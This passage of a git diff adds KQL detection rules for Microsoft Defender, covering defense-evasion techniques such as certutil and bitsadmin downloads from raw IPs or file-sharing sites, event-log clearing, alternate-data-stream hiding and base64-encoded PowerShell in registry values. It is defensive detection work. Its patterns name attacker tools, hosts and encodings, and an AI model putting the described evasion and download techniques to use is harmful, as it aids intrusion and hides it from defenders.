"\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\wermgr.exe") and (not(((ProcessCommandLine contains "-queuereporting" or ProcessCommandLine contains "-responsepester") and (ProcessCommandLine contains "C:\\Windows\\system32\\WerConCpl.dll" and ProcessCommandLine contains "LaunchErcApp ") and FolderPath endswith "\\rundll32.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_codepage_switch_via_chcp.kql b/KQL/rules/Defense Evasion/suspicious_codepage_switch_via_chcp.kql new file mode 100644 index 00000000..90ae16f1 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_codepage_switch_via_chcp.kql @@ -0,0 +1,12 @@ +// Title: Suspicious CodePage Switch Via CHCP +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community +// Date: 2019-10-14 +// Level: medium +// Description: Detects a code page switch in command line or batch scripts to a rare language +// MITRE Tactic: Defense Evasion +// Tags: attack.t1036, attack.defense-evasion +// False Positives: +// - Administrative activity (adjust code pages according to your organization's region) + +DeviceProcessEvents +| where (ProcessCommandLine endswith " 936" or ProcessCommandLine endswith " 1258") and FolderPath endswith "\\chcp.com" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_control_panel_dll_load.kql b/KQL/rules/Defense Evasion/suspicious_control_panel_dll_load.kql new file mode 100644 index 00000000..32aa93ca --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_control_panel_dll_load.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Control Panel DLL Load +// Author: Florian Roth (Nextron Systems) +// Date: 2017-04-15 +// Level: high +// Description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents +| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\System32\\control.exe") and (not(ProcessCommandLine contains "Shell32.dll")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql b/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql new file mode 100644 index 00000000..19e22c22 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql @@ -0,0 +1,16 @@ +// Title: Suspicious Copy From or To System Directory +// Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-07-03 +// Level: medium +// Description: Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. +Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003 +// False Positives: +// - Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/) +// - When cmd.exe and xcopy.exe are called directly +// - When the command contains the keywords but not in the correct order + +DeviceProcessEvents +| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS") and (not(((ProcessCommandLine contains "C:\\Program Files\\Avira\\" or ProcessCommandLine contains "C:\\Program Files (x86)\\Avira\\") and (ProcessCommandLine contains "/c copy" and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains "\\avira_system_speedup.exe") and FolderPath endswith "\\cmd.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_creation_with_colorcpl.kql b/KQL/rules/Defense Evasion/suspicious_creation_with_colorcpl.kql new file mode 100644 index 00000000..4abcd922 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_creation_with_colorcpl.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Creation with Colorcpl +// Author: frack113 +// Date: 2022-01-21 +// Level: high +// Description: Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\ +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564 + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\colorcpl.exe" and (not((FolderPath endswith ".icm" or FolderPath endswith ".gmmp" or FolderPath endswith ".cdmp" or FolderPath endswith ".camp"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql b/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql new file mode 100644 index 00000000..87f4b733 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql @@ -0,0 +1,13 @@ +// Title: Suspicious CustomShellHost Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: high +// Description: Detects the execution of CustomShellHost.exe where the child isn't located in 'C:\Windows\explorer.exe'. CustomShellHost is a known LOLBin that can be abused by attackers for defense evasion techniques. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 +// False Positives: +// - False positives are unlikely, investigate matches carefully. + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\CustomShellHost.exe" and (not(FolderPath =~ "C:\\Windows\\explorer.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_diantz_alternate_data_stream_execution.kql b/KQL/rules/Defense Evasion/suspicious_diantz_alternate_data_stream_execution.kql new file mode 100644 index 00000000..abb8f62b --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_diantz_alternate_data_stream_execution.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Diantz Alternate Data Stream Execution +// Author: frack113 +// Date: 2021-11-26 +// Level: medium +// Description: Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 +// False Positives: +// - Very Possible + +DeviceProcessEvents +| where (ProcessCommandLine contains "diantz.exe" and ProcessCommandLine contains ".cab") and ProcessCommandLine matches regex ":[^\\\\]" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_dll_loaded_via_certoc_exe.kql b/KQL/rules/Defense Evasion/suspicious_dll_loaded_via_certoc_exe.kql new file mode 100644 index 00000000..910ba681 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_dll_loaded_via_certoc_exe.kql @@ -0,0 +1,10 @@ +// Title: Suspicious DLL Loaded via CertOC.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-15 +// Level: high +// Description: Detects when a user installs certificates by using CertOC.exe to load the target DLL file. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -LoadDLL " or ProcessCommandLine contains " /LoadDLL " or ProcessCommandLine contains " –LoadDLL " or ProcessCommandLine contains " —LoadDLL " or ProcessCommandLine contains " ―LoadDLL ") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") and (ProcessCommandLine contains "\\Appdata\\Local\\Temp\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "C:\\Windows\\Tasks\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_double_extension_files.kql b/KQL/rules/Defense Evasion/suspicious_double_extension_files.kql new file mode 100644 index 00000000..b1f14456 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_double_extension_files.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Double Extension Files +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2022-06-19 +// Level: high +// Description: Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.007 +// False Positives: +// - Unlikely + +DeviceFileEvents +| where (FolderPath endswith ".rar.exe" or FolderPath endswith ".zip.exe") or ((FolderPath contains ".doc." or FolderPath contains ".docx." or FolderPath contains ".gif." or FolderPath contains ".jpeg." or FolderPath contains ".jpg." or FolderPath contains ".mp3." or FolderPath contains ".mp4." or FolderPath contains ".pdf." or FolderPath contains ".png." or FolderPath contains ".ppt." or FolderPath contains ".pptx." or FolderPath contains ".rtf." or FolderPath contains ".svg." or FolderPath contains ".txt." or FolderPath contains ".xls." or FolderPath contains ".xlsx.") and (FolderPath endswith ".exe" or FolderPath endswith ".iso" or FolderPath endswith ".rar" or FolderPath endswith ".svg" or FolderPath endswith ".zip")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_download_from_direct_ip_via_bitsadmin.kql b/KQL/rules/Defense Evasion/suspicious_download_from_direct_ip_via_bitsadmin.kql new file mode 100644 index 00000000..edefc408 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_download_from_direct_ip_via_bitsadmin.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Download From Direct IP Via Bitsadmin +// Author: Florian Roth (Nextron Systems) +// Date: 2022-06-28 +// Level: high +// Description: Detects usage of bitsadmin downloading a file using an URL that contains an IP +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")) and (not(ProcessCommandLine contains "://7-")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_download_from_file_sharing_website_via_bitsadmin.kql b/KQL/rules/Defense Evasion/suspicious_download_from_file_sharing_website_via_bitsadmin.kql new file mode 100644 index 00000000..51f3c06c --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_download_from_file_sharing_website_via_bitsadmin.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Download From File-Sharing Website Via Bitsadmin +// Author: Florian Roth (Nextron Systems) +// Date: 2022-06-28 +// Level: high +// Description: Detects usage of bitsadmin downloading a file from a suspicious domain +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 +// False Positives: +// - Some legitimate apps use this, but limited. + +DeviceProcessEvents +| where (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_download_via_certutil_exe.kql b/KQL/rules/Defense Evasion/suspicious_download_via_certutil_exe.kql new file mode 100644 index 00000000..3f0b508b --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_download_via_certutil_exe.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Download Via Certutil.EXE +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-15 +// Level: medium +// Description: Detects the execution of certutil with certain flags that allow the utility to download files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 + +DeviceProcessEvents +| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and ProcessCommandLine contains "http" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_driver_dll_installation_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/suspicious_driver_dll_installation_via_odbcconf_exe.kql new file mode 100644 index 00000000..5cd58835 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_driver_dll_installation_via_odbcconf_exe.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Driver/DLL Installation Via Odbcconf.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-23 +// Level: high +// Description: Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.008 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "INSTALLDRIVER " and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not(ProcessCommandLine contains ".dll")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_dumpminitool_execution.kql b/KQL/rules/Defense Evasion/suspicious_dumpminitool_execution.kql new file mode 100644 index 00000000..782ca154 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_dumpminitool_execution.kql @@ -0,0 +1,10 @@ +// Title: Suspicious DumpMinitool Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-06 +// Level: high +// Description: Detects suspicious ways to use the "DumpMinitool.exe" binary +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.t1036, attack.t1003.001 + +DeviceProcessEvents +| where ((FolderPath endswith "\\DumpMinitool.exe" or FolderPath endswith "\\DumpMinitool.x86.exe" or FolderPath endswith "\\DumpMinitool.arm64.exe") or (ProcessVersionInfoOriginalFileName in~ ("DumpMinitool.exe", "DumpMinitool.x86.exe", "DumpMinitool.arm64.exe"))) and ((not((FolderPath contains "\\Microsoft Visual Studio\\" or FolderPath contains "\\Extensions\\"))) or ProcessCommandLine contains ".txt" or ((ProcessCommandLine contains " Full" or ProcessCommandLine contains " Mini" or ProcessCommandLine contains " WithHeap") and (not(ProcessCommandLine contains "--dumpType")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_environment_variable_has_been_registered.kql b/KQL/rules/Defense Evasion/suspicious_environment_variable_has_been_registered.kql new file mode 100644 index 00000000..e2e660c4 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_environment_variable_has_been_registered.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Environment Variable Has Been Registered +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-20 +// Level: high +// Description: Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence + +DeviceRegistryEvents +| where ((RegistryValueData in~ ("powershell", "pwsh")) or (RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "C:\\Users\\Public\\" or RegistryValueData contains "TVqQAAMAAAAEAAAA" or RegistryValueData contains "TVpQAAIAAAAEAA8A" or RegistryValueData contains "TVqAAAEAAAAEABAA" or RegistryValueData contains "TVoAAAAAAAAAAAAA" or RegistryValueData contains "TVpTAQEAAAAEAAAA" or RegistryValueData contains "SW52b2tlL" or RegistryValueData contains "ludm9rZS" or RegistryValueData contains "JbnZva2Ut" or RegistryValueData contains "SQBuAHYAbwBrAGUALQ" or RegistryValueData contains "kAbgB2AG8AawBlAC0A" or RegistryValueData contains "JAG4AdgBvAGsAZQAtA") or (RegistryValueData startswith "SUVY" or RegistryValueData startswith "SQBFAF" or RegistryValueData startswith "SQBuAH" or RegistryValueData startswith "cwBhA" or RegistryValueData startswith "aWV4" or RegistryValueData startswith "aQBlA" or RegistryValueData startswith "R2V0" or RegistryValueData startswith "dmFy" or RegistryValueData startswith "dgBhA" or RegistryValueData startswith "dXNpbm" or RegistryValueData startswith "H4sIA" or RegistryValueData startswith "Y21k" or RegistryValueData startswith "cABhAH" or RegistryValueData startswith "Qzpc" or RegistryValueData startswith "Yzpc")) and RegistryKey endswith "\\Environment*" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql b/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql new file mode 100644 index 00000000..9c7bc5b3 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql @@ -0,0 +1,16 @@ +// Title: Suspicious Eventlog Clearing or Configuration Change Activity +// Author: Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2019-09-26 +// Level: high +// Description: Detects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic". +This technique were seen used by threat actors and ransomware strains in order to evade defenses. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.001, attack.t1562.002, car.2016-04-002 +// False Positives: +// - Admin activity +// - Scripts and administrative tools used in the monitored environment +// - Maintenance activity + +DeviceProcessEvents +| where ((ProcessCommandLine contains "clear-log " or ProcessCommandLine contains " cl " or ProcessCommandLine contains "set-log " or ProcessCommandLine contains " sl " or ProcessCommandLine contains "lfn:") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (((ProcessCommandLine contains "Clear-EventLog " or ProcessCommandLine contains "Remove-EventLog " or ProcessCommandLine contains "Limit-EventLog " or ProcessCommandLine contains "Clear-WinEvent ") or (ProcessCommandLine contains "Eventing.Reader.EventLogSession" and ProcessCommandLine contains "ClearLog") or (ProcessCommandLine contains "Diagnostics.EventLog" and ProcessCommandLine contains "Clear")) and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe")) or ((ProcessCommandLine contains "ClearEventLog" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe")) and (not((ProcessCommandLine contains " sl " and (InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\msiexec.exe")))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql b/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql new file mode 100644 index 00000000..806398c0 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Executable File Creation +// Author: frack113 +// Date: 2022-09-05 +// Level: high +// Description: Detect creation of suspicious executable file names. +Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564 + +DeviceFileEvents +| where FolderPath endswith ":\\$Recycle.Bin.exe" or FolderPath endswith ":\\Documents and Settings.exe" or FolderPath endswith ":\\MSOCache.exe" or FolderPath endswith ":\\PerfLogs.exe" or FolderPath endswith ":\\Recovery.exe" or FolderPath endswith ".bat.exe" or FolderPath endswith ".sys.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_execution_of_installutil_without_log.kql b/KQL/rules/Defense Evasion/suspicious_execution_of_installutil_without_log.kql new file mode 100644 index 00000000..d0d6b0f7 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_execution_of_installutil_without_log.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Execution of InstallUtil Without Log +// Author: frack113 +// Date: 2022-01-23 +// Level: medium +// Description: Uses the .NET InstallUtil.exe application in order to execute image without log +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where (ProcessCommandLine contains "/logfile= " and ProcessCommandLine contains "/LogToConsole=false") and FolderPath contains "Microsoft.NET\\Framework" and FolderPath endswith "\\InstallUtil.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_extrac32_alternate_data_stream_execution.kql b/KQL/rules/Defense Evasion/suspicious_extrac32_alternate_data_stream_execution.kql new file mode 100644 index 00000000..826d9baa --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_extrac32_alternate_data_stream_execution.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Extrac32 Alternate Data Stream Execution +// Author: frack113 +// Date: 2021-11-26 +// Level: medium +// Description: Extract data from cab file and hide it in an alternate data stream +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 + +DeviceProcessEvents +| where (ProcessCommandLine contains "extrac32.exe" and ProcessCommandLine contains ".cab") and ProcessCommandLine matches regex ":[^\\\\]" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_file_created_via_onenote_application.kql b/KQL/rules/Defense Evasion/suspicious_file_created_via_onenote_application.kql new file mode 100644 index 00000000..920e28f3 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_file_created_via_onenote_application.kql @@ -0,0 +1,13 @@ +// Title: Suspicious File Created Via OneNote Application +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-09 +// Level: high +// Description: Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote. +// - Occasional FPs might occur if OneNote is used internally to share different embedded documents + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenotem.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe") and FolderPath contains "\\AppData\\Local\\Temp\\OneNote\\" and (FolderPath endswith ".bat" or FolderPath endswith ".chm" or FolderPath endswith ".cmd" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".htm" or FolderPath endswith ".html" or FolderPath endswith ".js" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_file_creation_in_uncommon_appdata_folder.kql b/KQL/rules/Defense Evasion/suspicious_file_creation_in_uncommon_appdata_folder.kql new file mode 100644 index 00000000..086d74c8 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_file_creation_in_uncommon_appdata_folder.kql @@ -0,0 +1,12 @@ +// Title: Suspicious File Creation In Uncommon AppData Folder +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-05 +// Level: high +// Description: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution +// False Positives: +// - Unlikely + +DeviceFileEvents +| where (FolderPath contains "\\AppData\\" and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".cpl" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".lnk" or FolderPath endswith ".msi" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".scr" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") and FolderPath startswith "C:\\Users\\") and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\LocalLow\\" or FolderPath contains "\\AppData\\Roaming\\") and FolderPath startswith "C:\\Users\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql b/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql new file mode 100644 index 00000000..5ba94f04 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql @@ -0,0 +1,10 @@ +// Title: Suspicious File Downloaded From Direct IP Via Certutil.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-15 +// Level: high +// Description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and (ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")) and (not(ProcessCommandLine contains "://7-")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql b/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql new file mode 100644 index 00000000..9ea93132 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql @@ -0,0 +1,10 @@ +// Title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-15 +// Level: high +// Description: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 + +DeviceProcessEvents +| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_file_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/Defense Evasion/suspicious_file_encoded_to_base64_via_certutil_exe.kql new file mode 100644 index 00000000..b4f891fd --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_file_encoded_to_base64_via_certutil_exe.kql @@ -0,0 +1,10 @@ +// Title: Suspicious File Encoded To Base64 Via Certutil.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-15 +// Level: high +// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 + +DeviceProcessEvents +| where (ProcessCommandLine contains "-encode" or 